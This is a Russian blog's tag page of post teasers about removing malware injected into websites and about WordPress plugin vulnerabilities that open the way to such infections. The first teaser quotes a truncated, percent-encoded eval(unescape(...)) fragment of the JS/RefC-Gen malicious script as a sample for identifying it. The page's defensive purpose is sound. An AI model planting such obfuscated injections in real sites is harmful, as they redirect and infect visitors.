Посты про “удаление”

удаление вируса JS/RefC-Gen


Данная пометка говорит о том, что где либо на сайте вставлен вредоносный яваскрипт.
По данным указанным на странице вердиктов Яндекса JSRefC-Gen выглядит так:

eval(unescape('\%76\%61\%72\%20\%72\%20\%3D\%20\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%72\%65\%66\%65\%72\%72\%65\%72\%3B\%69\%66\%20\%28\%72\%2E\%69\%6E
.......
\%64\%69\%76\%20\%73\%74\%79\%6C\%65\%3D\%27\%64\%69\%73\%70\%6C\%61\%79\%3A\%6E\%6F\%6E\%65\%27\%3E\%22\%29\%20\%7D'));

* — часть вредоносного кода удалена для безопасности.
(далее…) «удаление вируса JS/RefC-Gen»» class=»more-link»>далее «удаление вируса JS/RefC-Gen»

удаление вируса Troj/JSRedir-NN


Очередная модификация вердикта от Яндекса для зараженных сайтов. «Очередная», потому что заражение очень похоже на Troj/JSRedir-NZ.
(далее…) «удаление вируса Troj/JSRedir-NN»» class=»more-link»>далее «удаление вируса Troj/JSRedir-NN»

уязвимость FancyBox for WordPress (Troj/JSRedir-QG)


5 февраля на сайте компании SecuriLab была опубликована статья про уязвимость, найденную в плагине FancyBox for WordPress. Эта уязвимость позволяет обойти ограничения безопасности и разместить вредоносную вставку на использующем этот плагин сайте.
(далее…) «уязвимость FancyBox for WordPress (Troj/JSRedir-QG)»» class=»more-link»>далее «уязвимость FancyBox for WordPress (Troj/JSRedir-QG)»

удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A


Вашему сайту Яндекс поставил пометку:

Сайт *** может представлять угрозу
Что произошло
Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.
Подробнее про вредоносный код

Яндекс периодически проверяет сайты, чтобы предупреждать пользователей об опасных страницах. Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.

Вредоносный код:
- обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
- содержит exploit (по данным поведенческого анализатора Яндекса);
- содержит Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A (по данным компании Sophos).

вирус Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A
(далее…) «удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A»» class=»more-link»>далее «удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A»

удаление вируса Mal/HappJS-A


Довольно редко встречающаяся вставка в яваскрипты (.js).
В основном делают ее в файлы шаблонов, скачанные с сайтов «бесплатных шаблонов» чтобы заражать компьютеры и мобильные устройства посетителей сайта.
(далее…) «удаление вируса Mal/HappJS-A»» class=»more-link»>далее «удаление вируса Mal/HappJS-A»

удаление вируса Troj/LSRedir-OT


Довольно часто встречается данный вердикт на сайтах. Но в сети он более известен как rsize.js.
Подгружаемый скрипт добавляет тег iframe, который обычно размещается вне видимой области страницы.
(далее…) «удаление вируса Troj/LSRedir-OT»» class=»more-link»>далее «удаление вируса Troj/LSRedir-OT»

удаление вируса Troj/JSRedir-NZ


Иногда встречающийся вердикт яндекса у взломанных сайтов Troj/JSRedir-NZ.
Из названия понятно, что происходит попытка подгрузки вредоносного яваскрипта.
(далее…) «удаление вируса Troj/JSRedir-NZ»» class=»more-link»>далее «удаление вируса Troj/JSRedir-NZ»

удаление вируса Troj/JSRedir-MN


Очень часто обращаются владельцы сайтов с просьбой помочь очистить сайт от Troj/JSRedir-MN.
Вирус довольно распространенный и встречается на любых движках. Как можно понять из названия, расположен в каком либо яваскрипте подключенном на сайте.
(далее…) «удаление вируса Troj/JSRedir-MN»» class=»more-link»>далее «удаление вируса Troj/JSRedir-MN»

удаляем баннер, выводимый в любом браузере


Обратился человек с вопросом: появился слева рекламный баннер MarketGid при открытии любого браузера
баннер в любом браузере
(далее…) «удаляем баннер, выводимый в любом браузере»» class=»more-link»>далее «удаляем баннер, выводимый в любом браузере»

уязвимость TimThumb в wordpress


Появилась непонятная нагрузка на впс. Просматривая статистику в htop начал ковырять тех пользователей, процессы апача которых крутились почти постоянно. В access.log нашлась причина
(далее…) «уязвимость TimThumb в wordpress»» class=»more-link»>далее «уязвимость TimThumb в wordpress»